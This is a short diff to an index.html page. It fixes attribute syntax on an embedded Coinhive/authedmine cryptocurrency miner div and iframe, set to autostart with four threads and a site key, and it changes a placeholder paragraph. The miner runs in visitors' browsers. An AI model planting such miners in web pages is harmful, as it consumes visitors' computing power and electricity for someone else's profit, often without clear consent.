--- a/index.html
+++ b/index.html
@@ -9,18 +9,18 @@
 </h3>
     <h4 align="center">
 <div class="coinhive-miner" 
- 	style="width: 53px; height: 59px";
-	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD";
-	data-autostart="true";
-	data-threads="4";>
+ 	style="width: 53px; height: 59px"
+	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
+	data-autostart="true"
+	data-threads="4">
     <iframe src="https://authedmine.com/media/miner.html?key=We3FxsjdPPBqzEjwPwDL01V77SZHOynA&amp;
- 	style="width: 53px; height: 59px;";
-	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD";
-	data-autostart="true";
-	data-threads="4";>
+ 	style="width: 53px; height: 59px;"
+	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
+	data-autostart="true"
+	data-threads="4">
     </iframe>
 </div>
-			<p>rrrrrrrrrrrr</p>
+			<p>1</p>
     </h4>
 </head>
 </body>
